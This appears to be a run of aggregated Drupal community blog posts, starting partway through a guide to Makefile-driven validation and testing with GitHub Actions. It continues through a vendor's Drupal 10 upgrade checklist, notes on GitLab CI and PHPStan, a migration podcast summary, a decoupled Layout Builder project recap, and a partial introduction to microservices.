PHP Code Sniffer also comes with the PHP Code Beautifier and Fixer tool, which can be run with the phpcbf command.

phpcbf: ## Run phpcbf.
	@ddev exec vendor/bin/phpcbf --standard=Drupal,DrupalPractice --extensions=php,module,inc,install,test,profile,theme,info,txt,yml web/modules/custom web/themes/custom web/profiles

The phpcbf tool can be used to fix a lot of coding standards errors quickly, so it's useful to add to your make file so that you can easily run it.

Note that all of the paths in the above command must exist in order for the tool to run correctly. You can remove "web/profiles" if you are not making use of install profiles on your site.

PHPStan

PHPStan is a tool that will statically analyse PHP code to look for common problems that might cause bugs. It needs a couple of helper packages to install the tool, but I have written all about how to install and use PHPStan in a Drupal codebase. You also need to create a phpstan.neon configuration file, which is automatically picked up by the tool when run.

Once installed and configured, the tool can be run through make.

phpstan: ## Run PHPStan analysis.
	@ddev exec vendor/bin/phpstan

To make the best use of PHPStan you need to set to the right level, this is all handled in the phpstan.neon file so the make command just needs to run the tool. My advice is to start at level 0 and solve everything that is uncovered by the tool. Then, you need to agree with the rest of your team what level you want to reach so that everyone is on the same page.

Eslint

Eslint is a JavaScript static analysis tool that analyses your JavaScript for best practice and potential bugs. It can also be used to validate the syntax of your YAML files, which can catch issues that the PHP Code Sniffer inspection can miss.

Drupal comes with everything you need to get up and running with Eslint and the setup-drupal command at the start installed the tool as part of the "npm install" command.

You need to create an .eslintrc.json file in the root of your project (if this isn't already present) to configure the tool. The "rules" area of this file allows you to turn off certain inspection criteria, which is useful if you want to use things like "++" in your custom code.

Here is an .eslintrc.json file that I often use in projects. The auto-detection of the react version is also added to this file is used to correct a small warning that appears when the tool is run.

{
  "extends": "./web/core/.eslintrc.json",
  "rules": {
    "no-plusplus": "off"
  },
  "settings": {
    "react": {
      "version": "detect"
    }
  }
}

It's also a good idea to have an ignore file that you can use to skip over anything that you don't want to lint. This is the case if you have any vendor directories in your codebase that contain third-party packages in them.

docroot/modules/custom/my_custom_theme/js/vendor/

Once you have that in place you can run the eslint tool, passing in the configuration file with the -c flag and the ignore file with the --ignore-path file.

eslint: ## Run eslint.
	@ddev exec npx eslint -c .eslintrc.json --ignore-path .eslintignore web/modules/custom
	@ddev exec npx eslint -c .eslintrc.json --ignore-path .eslintignore web/themes/custom

To assist your team locally you can add an "eslint-fix" task that will attempt to fix any coding standards issues that the tool finds.

eslint-fix: ## Run eslint with the --fix flag.
	@ddev exec npx eslint -c .eslintrc.json web/modules/custom --fix
	@ddev exec npx eslint -c .eslintrc.json web/themes/custom --fix

Running eslint-fix can often solve the majority of the issues detected, which means you can concentrate on fixing the issues that matter.

Again, note that the directories here must exist before they can be scanned. You can comment them out with a "#" at the start of the line.

Testing

Ideally, you should have a number of tests in your Drupal site. These can be split into unit tests and behavioural tests, but it is essential that we can run them on any platform required.

PHPUnit

Drupal's internal testing system is powered by PHPUnit and can be used to test individual functions, service classes, or user interaction.

To get PHPUnit running on your Drupal site you need to copy the phpunit.xml.dist file from the core directory in your Drupal install into the root of your project. There's a few settings in the file that need changing so that they point at the correct place, but once done you can commit this file to your project.

The tests themselves are easily run inside the DDEV environment, but we first need to ensure that the correct output directories are in place (with the correct permissions) before we can run the test. The following make command handles this.

phpunit: ## Run the Drupal phpunit tests for custom code.
	@ddev exec mkdir -p /var/www/html/private/browsertest_output
	@ddev exec chmod -R 777 /var/www/html/private/browsertest_output
	@ddev exec mkdir -p web/sites/simpletest/browser_output
	@ddev exec chmod -R 777 web/sites/simpletest
	@ddev exec ./vendor/bin/phpunit web/modules/custom/

This will run the unit tests across all of the custom modules in the project.

Cypress

Cypress is a behavioural testing system that acts like a user would on your Drupal site, logging in and interacting with it. These types of tests are tricky as they need to be run on your local environment. Well, that's not strictly true as they can run in a headless browser on any environment, but I've often found that the best results come from running it locally.

I often install Cypress next to the Drupal web root in a directory called "tests/cypress", so the following examples take that into account.

cypress: ## Run Cypress tests
	cd tests/cypress && npx cypress run

Cypress tests don't have access to the Drupal database, so there's also the question on managing the environment for the tests themselves. I've found that re-installing Drupal can lead to timeout errors on some environments, so I tend to opt for a re-import of the content using Default Content Deploy. I have written about using Cypress and Default Content Deploy in a previous article.

One command that I also include is a shortcut to the Cypress GUI, which is a powerful development tool that shows the tests being run in real time.

cypress-gui: ## Open the Cypress GUI
	cd tests/cypress && npx cypress open

Makefile Meta Steps

To speed things up you should create meta steps in your Makefile so that you can run lots of actions at once using the prerequisites feature. We just setup a load of tasks for validating and testing the codebase and it doesn't make sense to run them one by one. Using the prerequisites feature means that we can create simple make tasks that will only run the tasks we have created.

To this end we need to make two tasks, one for validation and another for tests. The "validation" make command is perhaps the most busy:

validate: composer-validate phpcs phpstan eslint ## Validate the project.

The tests can then be run in one go with a "test" make command.

test: phpunit cypress ## Run all of the tests.

With these tasks in hand we can now create out GitHub workflows.

GitHub Workflows

At this point you should be able to run either all or part of your install and test process using the Makefile. I won't go too into detail here about the GitHub workflow file as there is already some pretty good documentation on the file itself. I will go through the creation of a workflow file that will run all of the validation and tests for our Drupal site.

The workflow YAML file needs to live in the directory ".github/workflows/". I tend to call my file "test.yml" since this perfectly describes what it is doing.

The start of the file contains the name and details about when the workflows will be run. It is possible to get GitHub to run your workflow on a variety of different events on the platform.

The following shows the start of a typical GitHub workflow file that details the name and a number of actions. In this case we will run the workflow when a commit is pushed to a branch starting with the name "feature/", or when a pull request is created against the branches "main" or "stage".

name: Run tests

on:
  push:
    branches:
      - 'feature/**'
  pull_request:
    branches:
      - main
      - stage
      - prod

Next is the section that details the jobs that must be run for this workflow. The "test" workflow detailed below will run on the latest version of Ubuntu and has a number of steps.

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
       # Steps go here...

Let's define a few steps.

First, we need to checkout the codebase we want to test, which is done using the "actions/checkout" package. There are a lot more options available in this package, but we only need the default options for our purposes.

- name: Check out repository code.
  uses: actions/checkout@v4

As we are using DDEV we also need to include a step to let GitHub know about DDEV. This is done using the ddev/github-action-setup-ddev package. Again, there are lots of options available for this system, but as the DDEV environment will be automatically run we don't need to do anything else here.

- name: Include ddev runner.
  uses: ddev/github-action-setup-ddev@v1

With the DDEV environment ready we can now start installing the site, which is done using the "make setup-drupal" command we created at the start. Once this task has finished the site will be fully running within the DDEV environment on GitHub.

- name: Setup drupal for testing.
  run: make setup-drupal

Before running the tests we need to run our validation tasks using the "make validate" command.

- name: Run validate handler.
  run: make validate

Here is where our workflow differs slightly from the local environment. The PHPUnit tests and the Cypress tests need to be run in separate tasks due to the way in which the Cypress tests are run (more on that in a minute). To run the PHPUnit tests we just call our "make phpunit" command.

- name: Run test handler.
  run: make phpunit

The best way I have found of running Cypress tests on GitHub is by using the cypress-io/github-action package. This makes ready all of the things we need for our Cypress tests to run and we only need to include the "working-directory" directive as the Cypress tests aren't in the root of our project.

- name: Run cypress tests.
  uses: cypress-io/github-action@v6
  with:
    working-directory: tests/cypress

This task will automatically trigger our Cypress tests and will return the correct failure state if one of them fails.

That's all we need to add to our GitHub workflow file, here it is in full.

name: Run tests

on:
  push:
    branches:
      - 'feature/**'
  pull_request:
    branches:
      - main
      - stage

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository code.
        uses: actions/checkout@v4

      - name: Include ddev runner.
        uses: ddev/github-action-setup-ddev@v1

      - name: Setup drupal for testing.
        run: make setup-drupal

      - name: Run validate handler.
        run: make validate

      - name: Run test handler.
        run: make phpunit

      - name: Run cypress tests.
        uses: cypress-io/github-action@v6
        with:
          working-directory: tests/cypress

The file we create here is deliberately short because we added the complexity to the Makefile, rather than to this file. It also means that the configuration for your system is part of your codebase, rather than as part of the workflows.

Now that everything is in place you should check the actions permissions of your project in GitHub to make sure that you can actually run the workflow. These are the main permissions you should be looking at (which is within the "hashbangcode" GitHub profile.

The GitHub workflow dialog in the project settings of GitHub.

This "allow all actions" is quite an open permission, but it allows us to use actions from different repositories to checkout the code, run DDEV, and perform Cypress tests.

With all this in place you can now perform validation and testing checks on your Drupal codebase by either pushing to a "feature/x" branch or by creating a pull request against the main or stage branches.

Conclusion

With this technique in hand you can now push code to GitHub and automatically run validation and testing steps on your code. This provides a reliable safety net for your code so that you can be sure that everything is complaint and works correctly with every change that is added to your system.

I wanted to provide as much detail as possible to allow anyone to create their own workflows and actions in a few minutes to get started with continuous integration on GitHub. Even if you have no tests in your Drupal project you can make a start with code validation and then start writing tests with the detail posted here. Let me know if you get stuck with any part of this, I would appreciate the feedback.

The addition of workflows also integrates nicely with the GitHub interface. All workflows that pass will receive a nice little green tick, showing that they cleared all of the validations and checks in your workflow.

It is possible to take the GitHub workflow file a lot further than I have shown here, but I've found that adding complexity to this file often causes problems when attempting to debug problems with the workflow. If you are able to go from a blank slate to a fully validated and tested environment locally using one or two make commands then there's a good chance that the same will apply on GitHub.

The GitHub workflow can be taken in other directions as well. For example, you can also create a workflow that will trigger a deployment of your code to the platform of your choice. Again, I would suggest passing the actual build process off to another application like Ansible or Deployer, rather than add that complexity to the GitHub workflow file.

Deliberately adding the complexity of the project setup and validation/testing steps to the Makefile also allows us to port this technique to other systems with relative ease. For example, if we wanted to use GitLab then we could create a ".gitlab-ci.yml" file and add the needed make commands to that file in order to trigger the same actions on that platform. You would need to account for the presence of DDEV on that environment, but there are ways around using the DDEV wrapper and opting for pure docker commands if required.

Nov 10 2023
Nov 10

Takeaway: Upgrading to Drupal 10 isn't just about making a technical switch due to Drupal 9’s end of life; it's a commitment to ensuring your government website remains secure, compliant, and accessible. By making this move, you're not only keeping your platforms current but also enhancing your service to your citizens, showcasing your dedication to excellence in online services.

Although majority of the contents of the list here are for developers, it’s still important to know what to expect the upgrade will look like and how you can coordinate with the developers to ensure a smooth process.

My main Drupal 9 to 10 upgrade experience for a government website is when I worked on the Teachers' Retirement System of the State of Illinois (TRSIL) project. However, I’ll be adding here some information as well from my experience with the American Camp Association upgrade project.

Let's begin.

TRS Illinois Homepage

The Drupal upgrade checklist for government websites

In this section, I'll walk you through the entire upgrade process from Drupal 9 to Drupal 10, from preparations to post-deployment considerations.

Drupal 10 upgrade checklist

Before the upgrade

  1. Clarify your hosting environment: Different hosting platforms can influence the upgrade strategy. Ask your developer about your hosting environment, be it Acquia, Pantheon, or Platform.sh, and how it might impact the upgrade process.
  2. Prepare for the User Acceptance Test (UAT): The UAT is your chance to verify that you are satisfied with the upgraded site. While you don't need to know every technical detail, having a grasp of the primary features and functionalities is crucial. This knowledge will be invaluable when reviewing the upgraded site during the UAT phase.
  3. Give FYIs to the team (if any): Any information based upon previous experience updating your site will always be appreciated by the developers, especially if you have information on site features that are complicated. If you’re a new Promet client, this information is helpful but not required, since our developer will be doing the audit and the project manager will work with you on client testing plans.
  4. Review the Drupal upgrade audit: The audit takes about 8 to 15 hours, then the findings are put in a spreadsheet and given to the project manager. They’ll be assigning this to you for review. Once approved, we will proceed with the upgrade.
  5. Ensure data safety: Once the code is deployed, we have a contingency plan in place in case any issues arise. I refer to this as the Project Rollback Plan. For instance, with the American Camp Association, Project Manager Mary Rowell formulated a rollback strategy in the event of a deployment failure. If your team doesn’t have one, ask your developer to back up all data, configurations, and codes before starting the upgrade. It's essential to protect your site's information and provide a safety net in case anything goes wrong.

During the upgrade

  1. Stay updated on the workflow: Different hosting platforms might have unique workflows. Feel free to ask your developer about the specific steps they're taking, especially if you're not familiar with the platform you have. For instance, with Pantheon, multi-dev environments are a great feature the developers can use, but other platforms may not have them.
  2. Monitor module upgrades: One of the critical steps in the upgrade is updating the modules. Some might be deprecated, requiring patches or replacements. Regularly check in with your developer about the status of these modules, especially if you're aware of any that you absolutely need and don’t want to be replaced.
  3. Be ready for the UAT: Once the developer has completed the upgrade on a test environment, it's time for the UAT. This is your opportunity to ensure the features and functionalities you familiarized yourself with before the upgrade began are all working properly. Engage with your team, especially those who use the site daily, to gather feedback.
  4. Ensure continuous communication: Regular updates from your developer are crucial. Check the ticket to see the status of the upgrade, challenges faced, or any other critical information. Maintaining open communication ensures you're always in the loop.

After the upgrade

  1. Engage in thorough testing: Even after the upgrade, it's essential to continue testing the site. For example, our team performs smoke testing, where we list specific test cases the site needs to pass. If your team doesn’t perform this, ask what kind of tests they have available to ensure that all functionalities are intact and working as expected.
  2. Stay alert for any issues: While our quality assurance team (QA) is thorough, we still don’t know your site as well as you do. There may be issues that arise only in the production environment. With TRSIL, while the QA team did test the site, the client found an issue a couple of weeks post-deployment. With TRSIL, only QA checked the site if I remember correctly, since it took a few weeks before the client found an issue. It was an easy fix, but it was found pretty late. That’s why as much as possible we suggest to perform the UAT along with our QA.

What is the difference between Drupal 9 and Drupal 10?

Sign up for the Drupal 10 Ask Us Anything webinar.

Government websites are entrusted with sensitive information, making their security doubly important. Drupal has always been at the forefront of web security, and the latest version brings several improvements over its predecessor, Drupal 9.

Drupal 10.0 uses the Symfony 6.2 framework, and later Drupal 10 minor versions will use Symfony 6 minor versions.

Because of Symfony’s framework nature, you can rest assured that you’ll be getting regular security updates. Drupal 9’s “Managed Permissions” and Content Editor role are also here to stay.

Another area where Drupal 10 excels is accessibility. With features like the upgraded CK Editor 5, Drupal 10 makes the platform more user-friendly to content editors, making their work a whole lot easier.

Drupal 10 also introduced flexible, responsive grids that adapts more smoothly to screen sizes, ensuring that your constituents have a seamless experience whether they're on a desktop or a smartphone.

By moving away from older technologies like Internet Explorer 11, Drupal is not only keeping up with current web standards but also prioritizing security and efficiency.

Integration capabilities are also a highlight of Drupal 10. Compared to Drupal 9, Drupal 10 introduces almost three thousand extensions that are compatible, a 26% increase.

With Drupal 10, IT professionals in government can be confident in their website's ability to offer the latest features while adhering to the highest standards of security, compliance, and accessibility.

Is Drupal 10 easy to maintain?

When you're looking after a government website, you quickly realize how much the platform's architecture matters.

I've noticed that how easy a site is to maintain often comes down to how it was first set up. If everything was done right from the start, with clean and efficient code, then keeping that site running smoothly is a breeze.

It's not so much about Drupal 9 vs Drupal 10, but more about the quality of the work that went into the site in the first place.

That said, Drupal 10 does have some features that can make maintenance easier. For example, if your site doesn't have a ton of third-party integrations, it's going to be simpler to look after. But when you start adding in lots of integrations and third-party software, that's when things can get tricky.

You might run into issues when you're updating the core software or any of those third-party bits and pieces. So, the more complex the project, the more challenges you might face.

All in all, while Drupal 10 offers a great starting point, how easy it is to maintain also depends on how well it was built and how complex the project is. A well-made site is always going to be easier to handle, no matter which version of Drupal it's on.

How cost-effective is it to upgrade to Drupal 10?

When considering an upgrade, it's essential to weigh the costs. Upgrading to Drupal 10 is not just about the immediate expenses but also about the long-term benefits and potential savings.

In my experience with the American Camp Association's upgrade, we had set an estimate for the project, and I'm proud to say we stayed within the allotted hours.

The transition from Drupal 9 to Drupal 10 was smooth and cost-effective. However, it's worth noting that this might not always be the case for more complex rebuilds or migrations, like moving from Drupal 7 to Drupal 10, which can be more time-consuming and potentially exceed the initial budget if not set up properly.

Project Manager Amy Kim also mentioned that the original estimate for the TRSIL project was between 63 to 168 hours. The project took a total of 102 hours, which was close to her guesstimate of 94 hours.

This goes to show the importance of accurate estimations and the efficiency of our upgrade process, so working with a project manager who understands how to estimate is crucial.

Amy also stressed the cost of not upgrading. Delaying core or module updates can complicate and prolong the upgrade process in the future. In the long run, it's more economical to make smaller, incremental updates to keep the site secure and up-to-date.

Why choose Promet for your Drupal 10 upgrade

When it comes to upgrading your government website, you want a team that not only understands the technical aspects but also appreciates the unique challenges and requirements of government projects.

Having been a Drupal developer for over four years, I've had the privilege of working on various projects, including government websites.

Upgrading the TRSIL website from Drupal 9 to Drupal 10 was a significant milestone for me, and the challenges we overcame, such as addressing deprecated modules and configurations, have equipped us with invaluable insights for future projects (like yours).

But it's not just about my experience. All of our developers have successfully completed Drupal 10 updates. We also have a whole team including SysAdmin, QA, and our diligent PMs who ensure that every project is handled with utmost care. The PMs' role in creating rollback plans and ensuring projects stay within the estimated hours showcases our commitment to delivering quality while being cost-effective.

Our approach is also collaborative. We believe in keeping our clients informed and involved. Whether it's reviewing the initial audit, performing the UAT, or working with you to address any challenges during the upgrade, we ensure transparency and open communication.

Lastly, because of our continuous effort in contributing to the Drupal community and ensuring we are at the top of our game when it comes to upgrading and migrating clients, working with us means you’ll be working with both a Certified Enterprise Grade Migration Partner and a Certified Mid Scale Migration Partner.

Promet Source is a trusted Drupal migration partner

SEND WHY PROMET FOR YOUR DRUPAL UPGRADE TO YOUR STAKEHOLDERS

Making the right choice for your organization

Deciding to jump into a new platform or version is a big deal, especially since government websites serve as the backbone of our communities. Government websites are all about building trust and serving constituents. And from what I've seen, Drupal 10 is up for the task.

Government websites, whether a municipal website or a State website, have their own set of challenges. They have to be solid in terms of security, accessibility, and user-friendliness. Having worked on projects like TRSIL and the ACA, I can vouch for Drupal 10.

But here's the thing: The perks of Drupal 10 aren't just about its features. A smooth upgrade can make things run like a well-oiled machine, boost your site's functionality, and just make things easier for everyone. Think of it as leveling up your toolkit to better serve your community.

So, if you're on the fence about the upgrade, think about the bigger picture. With the right team and know-how, making the move to Drupal 10 can be a game-changer for the long haul. Contact us today and we’ll give you a quote within 48 hours.

Drupal 10 migrated clients logos

Nov 08 2023
Nov 08

Recognize the problem that your Drupal website is not sending emails? For example, when there's a (security) update or when someone has filled out a Webform. In this blog, I'll show you in a few simple steps how to ensure that the emails your Drupal website sends always get delivered.

Postbode
Nov 07 2023
Nov 07
Published on Tuesday 7, November 2023

The Drupal Association has been working on a monumental effort to migrate away from our bespoke DrupalCI continuous integration system to GitLab CI as part of the GitLab Acceleration Initiative. Drupal core's test runs are five times faster using GitLab CI. I have loosely followed the progress as Drupal moves from our custom-built infrastructure onto GitLab. But someone shared with me a little feature I missed: adding a PHPStan job to the default GitLab CI templates!

Fran Garcia-Linares (fjgarlin) is the engineer from the Drupal Association who has been working on the GitLab CI templates. GitLab supports templates to allow reusing configuration for continuous integration workflows. The new phpstan job does a handful of things, and I love its approach.

  • Allows modules to commit a phpstan.neon file to provide customized PHPStan configuration, such as level: 9 or specific errors to be ignored.
  • Exports errors as a JUnit report, GitLab quality report for the user interface, and terminal output for users to manually review.
  • Generates a baseline file uploaded as an artifact that can be included with the project so they can start using PHPStan and accept all existing errors to be fixed later on!

What I found very creative was the way each report has been generated. PHPStan uses a result cache to make subsequent scans faster. The phpstan job uses this to create multiple reports from the results. It runs PHPStan three times with different outputs, capturing the exit code after each job run and generating the baseline.

With most of my open source work being on phpstan-drupal or Retrofit, I haven't worked on Drupal modules that often recently. I haven't had a chance to try out GitLab CI on Drupal.org yet. I need to set aside some time to check it out!

Is your module using GitLab CI yet? If not, check out the extensive documentation: https://www.drupal.org/node/3356364/

Want more? Sign up for my weekly newsletter

Nov 07 2023
Nov 07

This first episode of the Drupal Migration series of Tag1 Team Talks focuses on the intricate process of migrating large-scale applications, especially with the end of life of Drupal 7 and 9 approaching. The hosts, Michael Meyers and Janez Urevc, are joined by a panel of additional experts, Benji Fisher, Lucas Hedding, Mauricio Dinarte, and Mike Ryan, who delve deep into the world of Drupal migrations. This discussion explores the terminology used in migrations and some best practice approaches to the process, aiming to equip you with the knowledge to navigate the upcoming talks on this topic.

[embedded content]

Overview

The panel discusses the nuances of migration, touching upon the differences between terms like upgrade, update, and migration and how they apply in different contexts. They emphasize the complexity of migrating from older systems to newer ones, highlighting the substantial changes in code organization and database structure. The conversation also covers the critical task of porting code and themes, focusing on the challenges and strategies of migrating Drupal themes. The panel shares personal experiences, underscoring the importance of considering the specific circumstances of each project when deciding whether to retain or redesign a theme during migration. The discussion extends to data migration. Mike Ryan elaborates on the Extract, Transform, Load (ETL) system employed in Drupal's migration API, emphasizing its flexibility and efficiency in handling data row by row.

As the episode wraps up, the panel hints at the rich history and evolution of the Migrate module, setting the stage for future discussions that promise to delve deeper into the world of Drupal migrations. The conversation underscores the critical role of meticulous planning and understanding of the migration landscape, especially when transitioning from older Drupal versions to newer ones. The panel encourages listeners to stay tuned for upcoming episodes that will offer a more detailed exploration of the topics in this introductory session, promising a wealth of insights and knowledge sharing in the series ahead.

For a transcript of this video, see Drupal Migrations: Getting Started.

Important Links:

Photo by Julia Craice on Unsplash

Nov 06 2023
Nov 06

Since Drupalcon Pittsburgh, we've been working on a decoupled Layout Builder for Drupal. We've reached the end of the statement of work, so let's recap the requirements and discuss what’s next.

Requirement 1: Create an npm package for developing decoupled components

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375410

Taking inspiration from @wordpress/scripts, develop an npm package that has tooling for building and packaging decoupled components.

The MVP of this will include:
 • a script for building JS and CSS

Out of scope but for future consideration:
• linting
• a script for checking license compatibility

Release this as a package on npm in the @drupal namespace.

Delivery

Not only does the developed package support building CSS and JS via drupal-scripts build, but we also added support for initialising a new project and code generation with drupal-scripts init and drupal-scripts generate.

Requirement 2: Determine how to deal with externals in Webpack

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375412 

Wordpress has @wordpress/dependency-extraction-webpack-plugin, a webpack plugin that extracts dependencies that are provided by Wordpress.

We don't have enough budget to go down the full 'roll our own' approach and it may be overkill for now. Instead, derive configuration for Webpack externals that ensures components don't bundle dependencies Drupal will guarantee to be present.

This config will likely be part of the package at 1)

Out of scope but for future consideration:
Create our own plugin like Wordpress with some Drupal specific replacements

Delivery

As per our previous post, we used Vite externals and then wrote a module to add support for Import maps to Drupal. We wrote a new version of the React module that works with import maps.

Requirement 3: Provide a registry of React Layout Components

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375413 

Create a simple layout registry and registration process for layout plugins. Create an MVP of some common layout plugins:
One column
Two column
Grid layout

Out of scope but for future consideration:
• Attempt to use the AST-generated Twig APIs to autogenerate React components that provide the markup for a layout plugin.
• Write a symfony/console command that can take the ID of a layout plugin and generate an equivalent React component.
• Bundle this as a part of a new experimental module.

Delivery

We wrote a context provider to create a layout registry and a way to pass this configuration from Drupal to React. We wrote React implementations of one and two column layouts.

Requirement 4: Persistence layer

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375414 

Create an OpenAPI spec for the persistence layer. The MVP will include the following endpoints:
Choose section
Add section
Remove section
Choose block
Add block
Update block
Remove block

These will mirror existing HTML endpoints from layout builder\

Create JSON equivalent versions of these routes. Some of these routes will exist to serve information for the decoupled layout builder (e.g. choose block/section) whilst others will exist to perform mutations of the configured layout on the Drupal side.

Out of scope but for future consideration:
Configure section
Move block

Delivery

We wrote an API specification for the needed endpoints. We didn't need add section, remove section, add block, update block and remove block, as all these are handled client side. We did need additional endpoints for saving, discarding and reverting.

All of these endpoints are implemented, with test coverage in the Decoupled Layout Builder API module

Requirement 5: Create a block discovery mechanism to associate a block plugin with a React component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375416 

Create a registry component that can translate block plugin IDs to these components. Allow modules to register a component as a React version of a Drupal Block plugin so the decoupled layout builder knows how to render it.
This will take inspiration from registerBlockType in @wordpress/block

Create a React version of the InlineBlock block plugin as a proof of concept
Out of scope but for future consideration:
Convert other Block plugins to React

Delivery

We wrote a context provider to provide a block registry and a way to pass configuration of this from Drupal to React. We wrote a React implementation of the inline block, which uses formatter and widget components. This component is quite complex as it needs to load entity view and form display configuration from Drupal. We have a working version of the Field block plugin too.

Requirement 6: Create a Drupal-rendered block fallback React component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375416 (could have)

Create a fallback React block plugin component that can make a request to Drupal for a rendered previews. Extend the persistence layer to add another Route for this.

Out of scope but for future consideration:
• Support a legacy configuration form for these blocks as well

Delivery

We ship rendered 'fallback' versions of each block in the API. This saves the individual plugins from needing to make many single requests and ensures the best performance as loading happens once upfront.

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375417 

Identify a list of initial widget plugins that make sense to convert to React as an initial proof of concept. Create a React version of these widget plugins making use of @wordpress/components.

Create a registry component that can translate widget plugin IDs to these components. Allow modules to register a component as a React version of a Drupal widget plugin so the decoupled layout builder knows how to use it to edit an inline block.

Out of scope but for future consideration:
A React powered media library widget

Delivery

We wrote a context provider to create a widget registry and a way to pass the configuration of this from Drupal to React. We wrote a React implementation of the text area widget, which uses an inline CKEditor for in-place editing with rich formatting. We didn't use WordPress components - more on this below.

Requirement 8: Create a discovery mechanism to associate a formatter plugin with a React component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375418 

Identify a list of initial formatter plugins that make sense to convert to React as an initial proof of concept. Create a React version of these formatter plugins.

Create a registry component that can translate formatter plugin IDs to these components. Allow modules to register a component as a React version of a Drupal formatter plugin so the decoupled layout builder knows how to render a preview of an inline block.

Out of scope but for future consideration:
• Devise a way for themes to modify the markup of these components, possibly by registering their own replacements in the registry.

Delivery

We wrote a context provider to create a formatter registry and a way to pass configuration of this from Drupal to React. We wrote a React implementation of the text default and string default plugins.

Requirement 9: React context provider/hooks

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375420 

To allow blocks/layouts/widgets/formatters to access this data without passing down props from each component, create a series of context providers and hooks to allow components to access and update this data.

We can take inspiration from e.g. useBlockProps in @wordpress/block-editor

Delivery

We didn't end up using hooks and context providers for this. Instead, we used a Redux toolkit - a mature state management solution designed for large complex applications. There are various selector functions made available so components can select state as well as reducers for updating state. The use of Redux means we can get things like undo and redo without much effort (more on that later).

Requirement 10: Layout builder component

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375421 

Add a component which manages the following UX behaviours:
Adding a section (layout plugin)
Adding an inline block
Editing an inline block

It is hoped that we can take inspiration from existing open-source components in this space including @wordpress/components and builder.io.

Out of scope but for future consideration:
• Editing (Configuring) a section
Moving a block

Delivery

Here we completed the following:

  • Adding a section
  • Adding a block
  • Editing a block
  • Moving a block
  • Moving a section
  • Configuring a section
  • Configuring a block
  • Viewing an outline of the layout, including support for moving components/sections
  • Saving a layout to Drupal, including autosave

You can try this for yourself in our interactive storybook.

Where to next?

The end of the Pitchburgh funding doesn't mean the end of the road. As we progressed through the project, we were building a backlog of out-of-scope items we discovered. A key aspect of this project was the evaluation of the feasibility of a decoupled layout builder. This work will also feed into the newly announced Page Building Experience initiative as one possible solution.

We tracked all the out-of-scope items in a backlog and have now added issues on Drupal.org for both the npm packages and the Drupal module.

We plan to keep working through these as part of our ongoing commitment to open-source. Do you have an interest in helping us? If so, reach out to me in the #layouts channel on Drupal Slack. There's a real mix of technology at use here - not just PHP but React, Typescript and CSS. 

We definitely need some help making the UI look nicer and more closely aligned with the Claro look and feel, as well as the work being done by the Admin UI initiative. If you've been looking for a way to get involved in Drupal contribution without a heavy understanding of Drupal's internals - this might be the ideal place to get started.

Nov 06 2023
Nov 06

Microservices is one of the important architectural software trends in 2023. As technology grows in popularity, more and more tools and technologies are emerging to serve microservices. An application is represented as a set of loosely coupled services in a microservices architecture. Each model is a self-contained business functionality with a simple interface. Such an independent development simplifies the maintenance of the application. Let's discuss in more detail how this architecture works and its features.

The definition of microservices architecture

A microservices architecture, often referred to simply as microservices or MSA, is a framework for creating a digital product that assumes software comprises small, independent services. Each such module is responsible for performing a separate task or achieving a goal; it uses a particular application programming interface (API) to contact other sets of services.
Such an architecture facilitates scaling and allows you to develop software and introduce additional functionality into existing programs quickly.

How do microservices work?

According to the requirements of microservice architecture, the digital product is divided into separate modules. Each service activates a specific procedure and most often manages its info base. Application elements can create notifications, log data, interact with the user interface, control client authorization, and perform other types of work successfully.
The concept of microservices provides software developers with a more decentralized approach to application development. Specialists can isolate application elements, make adjustments, deploy them as often as they like, and manage them independently. Suggest a digital product is not reporting correctly, experts can determine where the problem occurs, restart the service, change its operation and redeploy such a service if necessary, without interfering with the activities of other modules.

What is microservices architecture used for?

In simple words, microservices architecture makes it quick and easy to build applications. Significant potential for flexible deployment, combined with the active use of advanced technologies, allows you to shorten the development period. Let's analyze the current use cases for the microservices architecture:

  • Information processing: digital products based on a microservices architecture can simultaneously process many requests and a large amount of data.
  • Media content: well-known corporations, e.g., Netflix and Amazon Prime Video, deal with hundreds of thousands of API requests every minute. Various OTT systems that create significant media content repositories benefit from implementing an architecture.
  • Money transactions and accounts: microservices are helpful for software that processes many financial transactions and generates invoices. The unsafe operation of such applications can lead to significant losses for the organization.

Nowadays, Amazon, Netflix, Uber, and Etsy are prime examples of large corporations that have taken apart their monolithic software and transformed it into a microservices architecture. Adopting this approach brought their agility and scaling advantages to a new level.

Importance of microservices architecture in web development

According to a study by Business Research, the global microservices market will increase from 4.44 billion in 2022 to 5.31 billion in 2023 and 10.86 billion in 2027; while the average annual growth rate will be 19.6%. Let's talk about why the demand for microservices is rising every year.

  • They increase the pace of deployment: each application runs in its own containerized environment, so it can be moved anywhere without violating past conditions. It ensures the integrity of the project.
  • They empower the developer: each part of a digital product operates in a separate container to be improved and fixed individually. When mistakes occur, the developer does not need to review the entire code but only examine the individual service.

Microservices are transforming the traditional IT culture of disparate development and use teams. Such an architectural structure enables better collaboration and communication within the group, which prepares restructured departments for expansion, scalability, and resiliency.

Pros and cons of microservice architecture

The many benefits of microservice architecture motivate organizations to move from a standard monolithic structure to such advanced solutions. Let's discuss the main advantages of such a development system.

  1. Independent work of developers: the structure allows several groups of specialists to work in parallel. They can build, test, and deploy their code to speed up iteration.
  2. Agility and speed: when companies create complex monolithic applications, they often find it difficult to modify or update them to meet user requirements. Experts can quickly test and change the code, making it more tailored to the target audience's needs by adding microservices.
  3. Scalability: interacting with microservices facilitates software scalability since the architecture is based on small elements with different versions.
  4. Improved data security: by breaking down the architecture of computer systems into smaller pieces, sensitive information is protected from intrusions from other fields. While all parts are connected, creators can use secure APIs to put them together.

Although microservices have many advantages, they also have disadvantages; you must remember them when implementing the architecture. It is primarily due to the initial investment. While the structure provides capital savings in the long run, deploying systems requires significant capital to form an optimal hosting infrastructure with security and maintenance assurance. Remember to create groups of qualified employees to control different services.

Challenges of microservices architecture

Developers should be careful when working with microservices; they may face some pitfalls that must be paid close attention to. A robust API platform will eliminate these issues so your microservices function correctly. Consider what challenges users most often face:

